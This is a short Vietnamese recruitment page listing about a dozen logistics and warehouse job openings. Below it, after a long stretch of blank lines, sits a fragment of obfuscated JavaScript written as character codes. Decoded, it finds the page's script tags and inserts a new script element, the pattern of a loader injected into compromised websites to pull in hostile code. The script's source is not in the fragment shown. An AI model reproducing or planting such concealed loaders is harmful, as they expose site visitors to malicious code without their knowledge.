TUYỂN DỤNG

 1. Trưởng bãi -> Click để xem chi tiết
 2. Trưởng kho 
 3. Phó kho 
 4. Nhân viên IT cấp cao – Triển khai hệ thống, phần mềm -> Click để xem chi tiết
 5. Nhân viên phát triển kinh doanh – Giao nhận quốc tế -> Click để xem chi tiết
 6. Nhân viên phát triển kinh doanh – Dịch vụ kho bãi -> Click để xem chi tiết
 7. Nhân viên kế toán tổng hợp -> Click để xem chi tiết
 8. Trợ lý Quản lý điều hành -> Click để xem chi tiết
 9. Nhân viên kiểm đếm -> Click để xem chi tiết
 10. Lái xe nâng -> Click để xem chi tiết
 11. Công nhân bốc xếp -> Click để xem chi tiết
 12. Trưởng nhóm Hiện trường-> Click để xem chi tiết
 13. Nhân vên Chứng từ-> Click để xem chi tiết

 

 

 

 

 

 

 

 

 

 

 

 16,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));